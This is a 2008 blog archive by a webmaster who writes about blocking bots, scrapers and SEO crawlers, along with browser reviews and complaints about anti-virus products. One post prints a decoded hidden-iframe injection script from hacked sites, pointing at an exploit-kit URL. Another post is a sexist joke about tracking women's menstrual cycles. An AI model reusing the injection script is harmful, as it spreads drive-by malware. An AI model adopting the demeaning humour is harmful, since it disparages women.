Wednesday, December 24, 2008

Design With Screen Shots in Mind

With the proliferation of screen shots everywhere you would think that site designers would make sure that their sites make good screen shots, right?

Unfortunately this is not always the case.

When a surfer uses a visual search engine or a directory that has screen shots of the site the visual appeal often dictates which site is chosen and which site is left behind, not the SEO value of the text that got the site there in the first place.

Download a copy of WebShot and see how your site looks as a thumbnail.

If the resulting thumbnail doesn't convey an eye catching concept of the site you've failed.

More importantly, if the thumbnail comes up as a solid color because your Flash file is too slow to load and play in 30 seconds or for some other technical reasons, you've failed even worse.

One of my sites has almost 40K screen shots online and trust me when I tell you that the crap screen shots aren't getting the lion's share of the clicks, people just assume it's broken or something and click elsewhere.

Hope this helps a few of you revise how you think of your home pages.

Sunday, December 07, 2008

How to Block SpyderMate SEO Tool

Trapped another SEO tool called SpyderMate that crawls your site analyzing data.

Nothing wrong with using it but don't let competitors get a free ride analyzing your site.

The spider details: []
"MentorMate Spider"

Their host:
OrgName: Slicehost LLC
NetRange: -

They just keep coming and eventually they'll run out of data centers we haven't blocked!

Friday, December 05, 2008

Top 20 Forum Spammers for 2008

So far this year I've been tracking 9,694 unique IPs attempting to spam 49,492 links on my sites and they all bounced into a spam tracking log file.

Using this log file I can track where all the crap is coming from and (not so) surprisingly it's primarily coming from Europe.

The #1 spam host is which wins the prize with 4 IPs in the top 20 and their #1 spammer at 7,798 posts is still trying today!

The runner up is which has a few prolific IPs and took the #2 and #10 positions.

7798 :
2327 :
2174 :
2156 :
1889 :
1603 :
1551 :
1541 :
1218 :
1085 :
1008 :
1003 :
599 :
560 :
459 :
437 :
434 :
413 :
379 :
194 :
Not a single spam got thru but they just keep trying because they aren't that fucking smart.

Wednesday, November 05, 2008

Temporarily Block HotLinking To Find Copyright Abusers

Blocking hotlinks is usually considered a method used to conserve bandwidth and stop leeching of images off your server. However, you can also use hotlink blocking to quickly and easily find all those sites using your content.

The most common solution for Linux servers is to add the following hotlink blocking code into your .htaccess file.

RewriteEngine On
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http(s)?://(.*\.)? [NC]
RewriteRule \.(jpeg|jpg|gif|png)$ - [F]
Obviously you want to change to the domain name of your site before adding this to .htaccess on your site.

Now once you've added this code the fun begins as you sit back a few hours and wait for all the "403 forbidden" codes to start filling up your access log file.

Now using a simple grep on your log file will generate a nice list of sites in the referrer field that are hotlinking your images, or much worse which is often the case.

grep "\.jpg" access_log | grep " 403 "

grep "\.gif" access_log | grep " 403 "
The first part of the grep locates all ".jpg" files then the second part filters out all but the " 403 " forbidden errors.

After a day or 2 you'll have a nice list of sites to send C&D's, DMCAs, and all sorts of fun stuff.

Now disable your hotlink blocking script or remove it from your .htaccess file.

Why disable hotlink blocking?

Because hotlink blocking encourages people to actually download your images making the process of finding stolen images way more difficult. Therefore, a temporary hotlink block shows you everyone doing this just long enough to take corrective measures, then let your site wide open again and wait for the next batch of idiots to start hotlinking.

Hope a few of you find this little tip handy!

Monday, November 03, 2008

Pubcon '08 and Other Announcements

I'll be presenting at PubCon '08 on the topic of Competitive Intelligence. The only difference is the other panelists will be discussing how to find competitive intelligence while I'm telling people how to protect themselves from such research.

Also, keep your eye on this space:

All shortly upcoming announcements will be made via Twitter and there's a bunch coming up soon.

It's what you've been waiting for...

Thursday, October 30, 2008

JadynAve Bot Wants Your Local Data

If you have a bunch of local data like I do then you better protect it because JadynAve's Local Business Search appears to be coming after your site with their JadynAveBot!

Didn't ask for robots.txt, has no data whatsoever on their robot page except to email them if you have any questions, big whoop.

Here's the IP and user agent:
"Mozilla/5.0 (compatible; JadynAveBot; +"
I wouldn't bother trying to add them in robots.txt since they didn't ask for robots.txt.

This is a job for .htaccess!

A little research revealed they have also crawled without the "bot" in their user agent so you'll just want to block anything with "jadynave" in it.

Tuesday, October 28, 2008

Suspected Copyright Offenses

Something amusing hit my site from from which appears to be or the German version of T-Mobile.

I see the following IP and user agent: "Verdacht Vergehen nach UrhG"
Which Google translates into:
Suspected offenses under the Copyright Act
Well isn't that just the cutest little user agent to get caught in a bot blocker?

Now I've had my chuckle for the evening, back to work...

Why Does Copyscape/GoogleAlert Hide?

Never really played around with Copyscape/GoogleAlert much but I noticed it tries to completely hide it's presence when accessing a server which isn't cool.

Not that I'm a fan of plagiarism as my copy of the DMCA is almost worn out from use, but I'm even a less fan of sneaky web crawlers that pretend to be shit they aren't.

The IP that Copyscape uses: ->
The Copyscape user agent:
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
This is located in a Rackspace so if you're already blocking Rackspace then you probably won't be bothered with Copyscape in the first place:
inetnum: -
descr: Rackspace Managed Hosting
Of course you might not want to block this if you actually use Copyscape as it will become quite useless.

Monday, October 27, 2008

Viewzi's Meta Search Engine Taking Screenshots Without Permission

Here we go again with yet another visual search engine called Viewzi taking a bunch of screen shots without asking for permission from robots.txt.

In this case it's a meta search engine and technically the search engines Viewzi culls from has been given permission to crawl, but Viewzi itself was never given access permission.

Here's the Viewzi user agent:

Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b4pre) Gecko/2008022910 Viewzi/0.1
They appear to have just replaced the word Firefox with their user agent name Viewzi instead of just adding Viewzi to the agent which is kind of crappy to not even give Firefox attribution for their code being used to make screen shots.

Viewzi currently crawls from the "" range of IPs so if you're already blocking then you've blocked Viewzi already.

Sorry, but you won't get any Viewzi of my sites until you learn to play nice.

Saturday, October 25, 2008

Google Analytics Finds Bandits and Proxies!

Google Analytics has a Hostnames feature that most overlook which normally displays the hostname of the site your visitor landed on, like However, you'll probably notice a bunch of IP addresses and other interesting information in this list including sites that may have stolen your content!

To see what I'm referring to go into your Google Analytics account and go to Visitors -> Network Properties -> Hostnames.

Many of the IPs listed will be for Google or Yahoo translator services or such and you wouldn't want to block any of these. Other IPs and host names will be proxy servers in data centers you probably never heard of and possibly host names to places that have your stolen content posted!

Now expand the date range for your report to show all your Hostname data as far back as Google has been tracking your site and see what people have been doing with your site all this time.

Probably not worth trying to just block old single proxy IPs as proxy sites come and go all the time, but most likely you'll find these IPs are associated with data centers which host lots of servers and perhaps that proxy is just on a new IP so now you have another data center you can block.

Fun fun fun!

The list of actual host domain names, not the IPs, is what I found most useful as a few of those turned out to be idiots that managed to scrape a page or two from my site and still had my Google Analytics tracking codes on their pages!

Enjoy this new toy while I start sending C&Ds to the idiots with my tracking codes still on their sites.

Monday, October 13, 2008

Possibly Slowest Scraper Ever

I've seen slow scrapers before but this is fucking ridiculous. has been automatically challenged to answer now 227 times since 09/23/2008 and it just keeps plugging along slow enough to be off the radar of most webmasters but just fast enough it keeps nudging my bot blocker once a day to keep tracking it.

The user agent claims to be Firefox 3:

Mozilla/5.0 (Windows; U; Windows NT 5.1; da; rv: Gecko/2008070208 Firefox/3.0.1
Which could indicate someone making screen shots.

No clue what they're really doing but it's going really slow and they're getting pages of garbage instead of what they want, so I hope they're having a real good time fucking with my bot blocker.

Thursday, October 09, 2008

SEOMoz's New Linkscape Creates Webmaster Backlash

10/06/08 - A day that will live in internet infamy when a prominent internet company caught millions of webmasters off guard and sent shockwaves around cyberspace.

The event that caused this uproar was the launch of Linkscape with supposedly 30 billion pages indexed that stunned even the most savvy webmasters because they didn't see it crawling and were totally taken by surprise.

This new snooping SEO tool is billed as "An Index of the World Wide Web – 30 billion pages (and growing!), refreshed monthly" which has left webmasters that are already battered and abused by a massive onslaught of automated bots more angry than ever.

The internet entitlement mentality thinks that all webmasters have unlimited bandwidth and CPU and that anything that's online should just be taken without regard to the consequences.

Webmasters will no longer tolerate Indexation Without Representation and are moving to regain control over their sites, their content, and their competitive intelligence. Many webmasters that previously called bot blockers paranoid draconian control freaks are now crying for solutions to high profile marauders raiding their sites and reaping large profits. Now that the tide has turned the webmasters are preparing for the revolution with new sites such as the NoArchive Initiative, better bot blocking scripts, honey pots and much more.

Even a competitive site called MajesticSEO which provides a similar product actually gives Free multiple page reports on your domains if you register and prove you own the site which is at least a symbiotic relationship and not completely parasitic.

However, not only doesn't Linkscape give anything back to the webmaster for allowing your site to be crawled, or mined for competitive intelligence, they actually increased the price $30 to access their tools so you actually have to pay more for the privilege of being crawled to see your own data!

New Pricing, featuring three levels of PRO membership depending on the size and needs of our members. Current PRO members need not worry - you'll be grandfathered in at the current price level. We're just creating two new echelons for those who need access to more. If you'd like to lock in at the current price level ($49/month), I won't stop you :-)
So what benefit do we all get from all this?

For a monthly fee our competitors can see everything we do in infinite detail.

Wow! That's a benefit?

Sorry, but that just doesn't play homey.

Wednesday, October 08, 2008

Vote for the Best Tattoo - Neil Patel vs. IncrediBILL

Neil Patel has been making some noise about a lady friend getting his name tattooed her lower back as the ultimate sign of success.

Not to be outdone, one of my bot blocking fan girls stepped up to the ink for this IncrediBILL asstravaganza tattoo.

So which is the best tattoo?

You be the judge!

Thursday, September 11, 2008

Exploring The Tynted Web

Here we go with Tynt, yet another startup trying to socialize the web.


Yesterday there was a little bit of a flap about Tynt as they're running a wide open proxy on that allows page hijacking in the search engines.

Today Tynt responded on their blog to the SEO community.

First, we understand that Tynt has the potential to impact the major search engines in ways that were detrimental to the sites being Tynted. Our community recommended blocking spiders from crawling Tynts through the use of a Global Robots Exclusion file (robots.txt) as well as other techniques to minimize the problem. We have already implemented the ROBOTS.TXT file and are working on additional solutions.
That's a noble effort but now anyone running AdSense, YPN or any other contextual network ads are shit out of luck because their bot has to visit the page to serve up the ads. This turns out to be a moot point because allowing the bot also makes the ads go to shit for other reasons explored below.

I think Tynt is missing the point that their proxy server is wide open and can be used by scrapers and other online vermin to access your site although they might be blocked by other means.

Here, try it with Google or Yahoo or whatever you want, wide open and works for anyone and is ripe for abuse including phishing expeditions, very nice.

Shouldn't that proxy only work for registered members that are currently logged in?

Just a thought, I know it's beta and you want to demo some pages, but put a unique key in the URI so that only pages requested from actual Tynt members works with the proxy and it can't be randomly exploited.

For instance, instead of allowing the raw path "" maybe it should be "".

BTW, pass through the actual end user in your HTTP_X_FORWARDED_FOR field as we don't really find the NAT addresses of your internal servers all that useful.

Moving right along...

On their Twitter bio it says:
Tynt lets you put contextual relevance and dialog on web pages for sharing and interaction.
Listen, if I want dialog on my web pages, I'll put a comments section on the bottom of the pages, I don't need or want your help in this matter.

They clarify this further on the Tynt FAQ page:
Q. What kind of 'stuff' can I put on top of a web page?
A. There is a bunch of different things that you can do to a web page ranging from tools for research like sticky notes and highlighting text, to more fun stuff like text, speech bubbles, graphics and animations. Tynt is a fabulous tool for in context editorializing; in other words, Tynt lets you say what you think right on top of the topic you are talking about.
Lets' see, what does putting things on top of a web page mean? Vandalism, grafitti and lampooning quickly come to mind, something every business online welcomes. Several examples on their site actually show exactly this so no thanks, I think I'll keep my site out of your "stuff".

Wait, it gets even better, we get to foot the extra bandwidth bill for the privilege of letting the Tynt users download our pages just to draw horns and funny faces on our site. Fuck that.

Besides, if you Tynt a blog, forum, or twitter you're actually taking away from the value of those social mediums by breaking up and disjointing the conversation into multiple places which adds no value to the original discussion.

Here's another precious gem from the Tynt FAQ page:
Q. Does Tynt steal my traffic and therefore my revenue?
A. All Tynted web pages, including images, ads and other media all load live from the originating web server so every time a Tynt is viewed the Tynted web site get the ad revenue and traffic.
Holy misconception and major bullshit alert Batman!

Anyone using a context sensitive advertising medium like AdSense and YPN will be in trouble. This is because AdSense and YPN doesn't know their context in relationship to the domain name and it shows a bunch of off topic garbage which won't interest the person viewing the page whatsoever.

Want proof?

Let's use a Google AdSense case study site called CoolChaser just to see how well the ads work before and after you run the site through Tynt.

The results we saw were priceless:

Gay Bears Chat anyone?

That's just what my visitors crave, they love big hairy men that like other big hairy men and just can't keep their hands off of them - NOT.

As a matter of fact, something like this happening on a family friendly website could cause a huge problem but we won't delve into those issues at the moment.

Sorry, nothing about your Beta causes this problem as this is how AdSense responds over most any proxy and even in their own cache pages so anyone relying on AdSense or YPN revenue that has traffic redirected through Tynt's proxy will probably just lose out.

One of the Tynters tweeted me:
iancheung @IncrediBILL Tynt drives more people to sites and since people make money by ad views, it actually increases revenue.
I don't see how increased revenue is possible since you can't even see the ads because they're covered up with all those goddamn sticky notes!

From the blog:
Second, site owners have requested the ability to opt-out of having their sites publicly Tynted. We’ve given this a great deal of thought...
I gave it 2 seconds of thought and blocked your IP ranges:
Tynt Multimedia Inc. (TYNTM) - -
Out of site, out of mind, not a problem.

But wait, they have more in store:
The reason for the gateway (and the different looking URL) is to allow us to insert the JavaScript which loads the Tynt engine for the in-context comments and conversations (and hey, if everyone installs the plug in, then there is no need for our gateway and we can save ourselves the bandwidth and effort there too!).
The end users will be doing the page loading and we'll be unable to see them or stop them from fucking with our pages.

Many webmasters take their livelihoods and reputations very seriously and don't like being fucked with so there needs to be a way to detect the use of Tynt and or a way to opt-out of Tynt before this happens or it could get very ugly.

Last but not least, Tynt has made no mention of how they plan to make money.

Do you ultimately plan on using our sites to trigger your ads?

That's when the shit will really hit the fan.

Have a nice week.

Sunday, September 07, 2008

2008 a Chrome Odyssey

Did Stanley Kubrick join Google marketing?

Ever since Chrome released it's been like watching the online monkeys beat the monolith with bones like the intro of 2001 a Space Odyssey.

Sometimes people just make me want to smack them upside the head the way Gibbs dishes it out to DiNozzo on NCIS.

First, Google releases a beta product and everyone starts reviewing it like it's a finely polished shipping product. For those of you not in the software business there are various levels of beta which typically evolve into final beta, meaning that all features are frozen for that release, Then comes a beta gold candidate which appears to be as bug-free as possible and is about to become a shipping product. The initial release of Chrome is an obvious real beta that they want feedback on so get over it, it's an early beta, it's no where close to a final beta IMO but it's a damn good first release.

Second, a whole bunch of people are trying to steal Google's thunder comparing it to MSIE 8 primarily, which is also still in beta. If Google didn't already have those features coded then they wouldn't be in their initial beta either. It's not like someone at Google woke up on a Monday, read the MSIE 8 feature list, and wrote a whole bunch of new features for Chrome that just showed up in the release on Tuesday, get real. Most of those features were obviously in the works for quite some time but MSIE 8 was publicly known opposed to the closely held secrets of Chrome.

Thirdly, it's mostly just desperate cries for attention and link bait for people that have nothing better to do than bash Google on a good day and how there's more fuel for the fire.

Just remember, the first version of Firefox wasn't much to write home about which was initially distressing considering it's Netscape heritage, but it got better in a hurry until they bloated up Firefox 3, what a slug.

Additionally, Chrome is built on the same rendering engine that runs Safari so it has a lot of history already and should be pretty solid except for it's handling of some plug-ins which will be fixed.

Overall, I'm hopeful that Chrome gets the bugs patched quickly because I love the speed and snappy page displays like you get with Opera without all the javascript quirks.

I just hope it ships with add-on capability or more java script control like Firefox's NoScript and I'll be a happy boy.

Remember people, it's JUST BETA, give them a chance to polish it up.

Tuesday, September 02, 2008

Chrome Shines While Fat Lady Sings for Opera, Firefox and MSIE

I'm very hard to impress, an old school hard core programmer that detests software bloat from lazy assed programmers using poorly implemented cross-platform development environments.

I like fast and lean code, shit that makes an old laptop look all shiny and new and maybe that's why Google named their new browser chrome cause this fucker shines.

It was only yesterday that I threw my hands up in the air and ran screaming from Firefox 3's latest fat, bloated leaky slower than shit browser and declared Opera was one hell of a fast alternative.

Unfortunately, for all of Opera's speed there was a few quirks that meant it wasn't a 100% solution after all starting with the fact that some javascript in Horde Webmail (used in Plesk) had a few problems so it was only 95% usable, still workable and not a show stopper. 

The show stopper was Opera's copy & paste was unable to properly render text to an HMTL editor as the full HTML content that had been copied from a web page was stripped down to plain text. Plain text is expectected when you paste into something like Notepad, but not when you paste into an application capable of negotiating the data type and wishes to receive the full HTML content from the browser.

For us old school Windows programmers this is CLIPBOARD 101 kind of shit and Opera failed the class miserably.

Guess what?

Google chrome in BETA didn't have the javascript glitches in Horde Webmail and it knows how to properly paste HTML text, something Opera has had years to perfect.

Both Opera and Chrome are fast but the devil is in the little details and so far Chrome is in league with the devil.

OK, Chrome doesn't ship with Java, appears to crash with Quicktime (who gives a shit besides Apple and all their cultists) and has a few other plug-in problems, but for a BETA it's fucking phenomenal, it's DA BOMB!

Although I have to ask Google one simple question:

Where's the goddamn TITLE bar and the STATUS bar?

Don't make me drive down to Mtn. View and teach you Windows 101 coding, come on, these should've been there from the get go.

Other than that little peeve, and the lacking of security control given by Firefox add-ons like NoScript, I'm totally stoked. I'll cut Google some slack and assume they'll remedy the missing title and status bar, include Java, fix the quicktime crash, etc. and provide more control over javascript.

Google, a damn fine first showing, hats off, kudos, just fix the rest of this and I'm a solid Chromer for life.

BTW, I'm posting this using Google Chrome so this fucker does work.


Monday, September 01, 2008

Opera 9.5 Smokes Firefox 3

The latest Firefox 3 upgrade was just pitiful and the memory footprint was fatter, it seemed to be leaking memory, page loads just crawled at a snails pace, it was an overall hog.

The options were limited:

- Go back to MSIE 7, which isn't much better, or

- Give Opera one last try as I've always found something that stopped me from using Opera in the past.

Well, the first thing I noticed is Opera 9.5 is faster than shit and loads some pages 3x-5x faster than Firefox, especially my own blog which makes Firefox choke. The second thing I noticed was the footprint of Opera 9.5 is about half that of Firefox when it loads and operates.

Seriously, Opera loaded pages so much faster than Firefox it felt like I was using a new computer!

So now I'm going to give Opera a try and see if there's any gotcha's that will stop me from using it but so far it's looking really good and I may just be the next Opera convert!

BTW, this blog post is my first in Opera!

Sunday, August 31, 2008

MJ12BOT's Dirty Little Secret

Many of you have seen MJ12bot hammering your site from IPs all over the world, both the legit crawler and the fake virus version 1.0.8 as well.

"Mozilla/5.0 (compatible; MJ12bot/v1.2.3;"
Everyone likes an underdog and we tolerate these crawlers when they claim such a noble purpose:
We do spider the Web for the purpose of building a distributed search engine with fast and efficient downloadable distributed crawler that will enable people with broadband connections to help contribute to, what we hope, will become the biggest search engine in the world.
It's been crawling for years and I've never seen any traffic from this damn thing, has anyone?

Then the "offshoot" of this so-called search engine emerges which is Majestic SEO which claims to be a "a commercial offshoot from Majestic-12".

What do they do with the data gathered when they crawl your site?

Here's a direct quote, including typos and bad grammar:
competitive reports are now avaialble, you can buy credits and then use them to see information any domain!
So let's get this right, if we let you crawl our server then you'll let our competitors buy information that can be used against us?

We have a simple solution to this distributed problem:
RewriteCond %{HTTP_USER_AGENT} MJ12bot
RewriteRule .* - [F]
Compete with that.

FireFox 3 Bloated Leaky Pile of Shit

Firefox 3 with all it's much anticipated upgrades turned out to be a big fat flop that's annoying me to the point I'm thinking of switching back to Internet Explorer or giving Opera a try.

Some of the new features seem interesting but overall it's slower, bloated, and appears to be leaking faster than the Titanic after a close encounter with an ice cube.

The damn thing starts at about 40MB and just grows and grows.

Here I'm sitting with a lousy 2 tabs open after using it for a while and it's holding 100MB of memory and not releasing it.

Maybe it's one of the 2 plug-ins I'm using causing the leaks, who knows, but this hog is almost intolerable as it just grows and grows.

Ah well, you gave it a good run Mozilla, time to look elsewhere.

Sunday, August 24, 2008

Woman Weather Channel

During a discussion with a few of my male friends today it became obvious that some of us could benefit from such an online service.

You could have a widget, perhaps a Google Gadget even, sitting on your desktop that declares your woman's current menstrual state such as:

Today: Slightly Spotty
Then you could click on the widget and look at the 5 day forecast and see what's in store for the week:
Mon: Spotty
Tue: Heavy Flow
Wed: Flow
Thu: Spotty
Fri: Clear
Obviously the paid version I'm tentatively calling "Wife Alert" could also send potentially life saving text messages to your cell phone at appropriate times.

It's 6am on that fateful morning when the text message alarm chirps:
Perhaps even an advance warning system with even more important information such as converging events that could spell disaster if you fuck up.
Considering how much physical and mental abuse this could potentially save men, it's even possible your health insurance company would pick up the tab to "Wife Alert" as a standard health benefit.

Just like how the weather channel allows you to look up the weather of other locations around the world, the Woman Weather Channel would allow you to look up celebrities online.

Could you imagine tuning in to watch The View when you knew two of the hosts were going to have a bad day at the same time?

The Woman Weather Channel could also be an indispensable resource for anyone in business or politics that could simply avoid any bosses, colleagues or co-workers known to be having a "bad day" until her weather report showed all clear.

The possibilities are endless so tune into the Woman Weather Channel today and all you husbands subscribe to "Wife Alert" as it could be your life it saves!

Thursday, August 14, 2008

How Flawed is Your Anti-Virus?

Some of the anti-virus web surfing protection products are permitting some very risky behavior due to flaws in their basic design. For instance, some of them allow your browser to willingly go to known bad locations they have in their database until something catastrophic gets downloaded. Once the file is downloaded it might be too late so there's the real problem.

Here's a quick for instance, the site "" was found in an Invisible IFrame launcher yet the page with that code was deemed safe. However, when you go to, which you should NOT go to as it's very bad, downloads a wide variety of things or randomly redirects you to Google of all places. That redirect to Google is probably tossed in there to throw people off the path trying to figure out if this is the source of the virus, but that's another story.

Anyway, several anti-virus and link scanning products just ignored the fact that this site is known to be bad and let me visit these pages without so much as a warning. Better yet, when I fed some infected pages directly into my browser just to see what happened, they couldn't detect the Invisible IFrame launcher script properly, and even when they did, didn't stop me from running the page at that time or even pop a warning!


Because, like many other malware sites, wasn't downloading a bad file at that particular instance. However, a few minutes later the malicious files were flowing from again and then the anti-virus woke up, finally.

Shouldn't the fact that downloads any malware be enough of a reason to set off some alarms and stop people dead in their tracks from going there?

Apparently not.

It appears that hackers have a leg up on spoofing the malware scanning software and the anti-virus developers so it's no wonder that machines are getting hacked all over the place.

Although the anti-virus products do add some value to protecting surfers they unfortunately cause more harm than good by giving a false sense of security. With the massive gaping holes in their technology the only try way to surf safe is using NoScript since no javascript whatsoever means no Invisible Iframe launcher tricks.

I'm not going to name which anti-virus products I tested at this time because I'd like to give them time to fix their products before exposing their shoddy methodologies and putting their customers at risk being more of a target than they already are.

Come on anti-virus writers, get your shit together before I lose my shit and do a real expose!


The one interesting twist in the Invisible Iframe launcher script that I found this time is that it was injected into a common javascript file shared site wide instead of just being inserted into the home page. This is a nasty strategy twist that gives the hackers a bigger bang for their buck by getting more infected pages with a lot less work and the code isn't in the HTML file which is where most people would look first.

Thursday, July 24, 2008

SEO Community in TailSphinn

I tried to support Sphinn's efforts by putting the SphinnIt button on my site to help raise awareness of what they were trying to do with something unique for the SEO community.

Unfortunately, Sphinn devolved into a bunch of Sphamm and when one of their members pointed out how widespread the problem was they banned Edward. OK, Edward (pageoneresults) can push the envelope a little but it wasn't out of disrespect, he was making a very public spectacle to get them off their dead asses to fix the problem.

So EvilGreenMonkey of Sphinn even admitted Edward was right:

The person highlighted in Aaron's post has had their account terminated, there is no need to interact with them further. The findings highlighted in his comments were not new or truely condemning. Yes, people spam Sphinn - we remove the spam. Yes, submit.php URLs were getting indexed - although from Google indexing WP social media plugin links rather than spamming. Fixes to these problems were either already implemented or scheduled for release before said user started his campaign. I'll make no further comment on this post and suggest that we leave it at that.
So instead of saying "Thank you for bringing it to our attention" and "We're working on the problem" with a proposed implementation date, they just ban him and that's when all hell broke loose in the SEO blogosphere.

No only that, shouldn't the Sphinn members get an apology from Sphinn for forcing us to suffer through all that Sphamm which one simple NOFOLLOW would've stopped from the beginning?

Perhaps Sphinn bears some of the blame here because if "his comments were not new or truely condemning" then you allowed the situation to continue unabated until one of your members simply couldn't take it anymore.

So Sphinn members had to put up with Sphamm for a year and not even a simple apology but they shot the messenger that finally snapped, good going Sphinn.

Right on the heels of this they decide to take a swipe at Kimberly Bock and threatened to ban her for some hypocritical horseshit.
1. Your flame post submitted by another user, which went Hot on Sphinn, was removed due to 26 Desphinns and many complaints.
2. The posts about your personal life had no internet marketing relevance and are seen as off-topic/spam.
So let's review Kimberly's plight as she was a) threatened over a post that someone else submitted to Sphinn and b) claiming that 2 SEOs getting married isn't news.

Holy mother of horseshit, have they lost their minds?

I find their current heavy handed reputation management tactics too autocratic to support Sphinn anymore simply because the good of the community isn't being served when criticism is swept under the rug and attempted to be squelched instead of addressed.

The Sphinn button is off my site because I certainly wouldn't want to be associated with all the vapid top 10 lists being submitted and I sure as hell don't want someone yelling at me about material on my site not being suitable in the event someone else Sphinn's it, such as happened to Kimberly.

Maybe someday if Sphinn gets their act together and stops shooting the messengers and they improve the quality of their content, the SphinnIt button will return.

Until that day, SphuckIt!

Sunday, July 06, 2008

iPowerWeb Hacking Continues

Over a year ago I wrote about a bunch of iPowerWeb's shared servers being hacked, and it looked like they were trying to clean it up, but now it's time for round two of hacking.

The latest batch of hacked sites may have a DNS hack as well, I'm not sure that's the case but Alex seems to think it is.

All these sites have the following Whois Name Server entries:

Sure looks like iPowerWeb, right?

But the reverse DNS all goes to IPs on * which links to BIZLAND

Here's a sample of the javascript in this round of site hacking:
Don't go to the link below if you know what's good for you, it's not safe.

The javascript above, when decoded, is the following:
window.status='Done';document.write('<iframe name=f2f8f656791 src=\'http:// 58.65.232.*/gpack/index.php?'+Math.round(Math.random()*74880)+'2\' width=480 height=156 style=\'display: none\'></iframe>')
You guessed it, bad things happen at which APNIC claims to be out of Honk Kong which has a San Francisco mailbox according to their website.

Can someone explain why this exploit site still exists if these guys are doing business with a US address and all hell isn't raining down on their parade?

I don't get it, the web has gone mad...

Tuesday, June 17, 2008

AVG 8 LinkScanner Fiasco Recap

For those of you that might've missed the whole AVG 8 LinkScanner disaster and ensuing AVG reputation nightmare, here's a quick recap and links to places to read all the details.

Webmasters started noticing a rash of distributed IP's with the same user agent, no referrer, and a few other technical issues I won't go into now, that suddenly started pounding their sites:

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)
At first I thought it looked like a botnet scraper but soon someone figured out it was related to the new release of AVG 8 that included a LinkScanner that was amusingly called "Safe Search" which is now not-so-safe since everyone knows how to spoof it.

The story was first broken on WebmasterWorld, then again on The Register, then a follow up on WebmasterWorld and a few other places. The best part of the story on The Register actually unfolds in the comments section which is now over 200 posts but has some good comments if you're willing to wade through it all.

It appears this Safe Search link scanning was a knee jerk reaction to McAfee's SiteAdvisor. SiteAdvisor uses stale search results to flag sites with known exploits. However, Safe Search, much to everyone's dismay, hits all sites in real-time to check for exploits for every single search. The most amusing aspect is that the very AVG feature which is supposed to make the internet safer has been attacking sites and become malware itself.

Here's a list of all the major points so far:

1. AVG 8 appears to be causing an escalating DDoS attack as more and more AVG users upgrade causing some sites to be hit by many thousands of unique IPs per day.

2. AVG's Safe Search is causing webmaster analytics worldwide to be totally skewed unless you filter out the ";1813" user agent.

3. AVG 8 is exposing their customer information to sites their customer didn't even visit and potentially setting them all up for some future exploit. They'll be targets for direct marketing to switch to a new AV product at a minimum with savvy affiliates making out like bandits.

4. The Safe Search link scanner has the potential to automatically access sites that aren't allowed at work, could violate your ISP's AUP or be illegal in some jurisdictions. This could result in reprimand, losing your ISP or potentially being flagged in honeypot sites for illicit activities.

5. The malicious sites can already fake the Safe Search code which appears to put users of the free AVG 8 at risk. The risk is because you only get Safe Search, the link scanner which is being spoofed, but you don't get Safe Surf, which stops HTML exploits as you load the page. It appears you need a paid version of AVG 8 to actually be protected from online exploits so be careful where you surf using the free version of AVG 8.

Well, that's the recap in a nutshell.

This just goes to show you how the best intentions can have disastrous results when people don't think about the consequences of their actions, especially when dealing with an installed base of this scale.

Thursday, May 22, 2008

Did CSC's Spybot Get Caught?

Looks like yet another corporate compliance spybot is hitting our servers, not like we need yet another spybot.

There's only one IP out of this entire range that consistently hits my servers.

OrgName: Corporation Service Company
NetRange: -

They claim to crawl the web:

Our proprietary technology scans and digests web pages, images and other Internet content around the clock to locate critical occurrences of online brand abuse.
Yet again, nobody has ever seen a crawler name in use so I'll hazard a guess it doesn't read or respect robots.txt when it's crawling, or possibly trespassing, on our servers.

I'd post more about the specifics on this one but I really don't want them to wise up too much because some of the things their crawler does, while pretending to be a browser, trips several alarms in my bot blocker.

Kind of hard to digest web pages when you're busy digesting error pages instead!

Just another day of the internet version of Spy vs Spy.

Monday, May 12, 2008

Impact On Your Bandwidth Will Be Minimal My Ass

How often do we see that happy line of horse shit spread by every new startup that crawls the web about how minimal it's impact will be?

Every fucking one of them claim it but when you add them all together the bot traffic is quickly exceeding the human traffic.

Who the fuck am I kidding, on most sites the bots clearly out number the humans in pages read on a daily basis.

First we put the big search engines on top of the heap with Google, Yahoo and MSN crawling the crap out of your servers daily. Just the three of these guys can easily read as many pages as 10K visitors a day. Then throw in the wannabe search engines like Ask, Gigablast, Snap, Fast, etc. ad nauseam and it's over the top.

Now expand that list to include the international search engines like Baidu, Sogou, Orange's ViolaBot, Majestic12, Yodao, and on and on, tons of 'em.

Then we have all the spybots that feel entitled to crawl your site like Picscout, Cyveillance, Monitor110, Picmole, RTGI, and on and on.

Next add up all the specialty niche bots like Become, Pronto, OptionCarriere, ShopWiki, and all sorts of shit too numerous to mention.

Pile on top of this all the free fucking tools that every little shithead and make believe company uses to scrounge the 'net for god knows what, and god's not telling, like Nutch and Heritrix, plus the web downloaders, offline readers, and more.

Don't forget, many of these so-called search engines and shit now want screen shots as well so after they crawl your page they send a copy of Firefox or something to your site to download every page again plus every fucking image, never cached, over and over and over.

Did I forget to mention directories?

They'll want to link check you and get screen shots as well, don't leave them out or they'll feel fucking neglected.

Wait, there's more, those social sites like Eurekster, Jeteye, etc. that let people link to your shit and then come back banging on your site all the time to make sure that shit's still valid.

Then add up all the RSS feed readers and aggregators that pull down your RSS feeds that nobody ever fucking reads. Not to mention the RSS feed finders like IEAutodiscovery that run amok on your site just looking for RSS feeds ... FUCK!

If you run affiliate programs you have CJ quality bot or some shit hitting your site and if you run ads then the Google quality bot, it's always something.

Don't forget the assholes running the dark underbelly of the web with all the scrapers, spam harvesters, forum, blog and wiki spammers, botnets and other malicious shit pounding on our sites daily.

Add on top of all this shit Firefox, Google Web Accelerator and now AVG's toolbar all pre-fetching pages that will most likely never be read and holy shit, we're being swamped!

OK, now that we've identified all this bot traffic, where's all the fucking people?

Of course you think all those hits from MSIE and Firefox are people, right?

Hell no!

Are you out of your fucking mind?

Those hits are the scrapers, screen shot makers and companies like Cyveillance and Picscout that don't want you to stop them from crawling your site so they just pretend to be humans to get past the bot blockers.

Well guess what?

There are no fucking people on your site. the internet is now run for and used exclusively by bots.

Apparently you missed the memo.

Comparing Effectiveness of Anti-Virus Web Protection Methods

There's three basic methods being used at the moment to protect web surfers from potential dangers which are static (stale), active and passive.

Static Web Protection

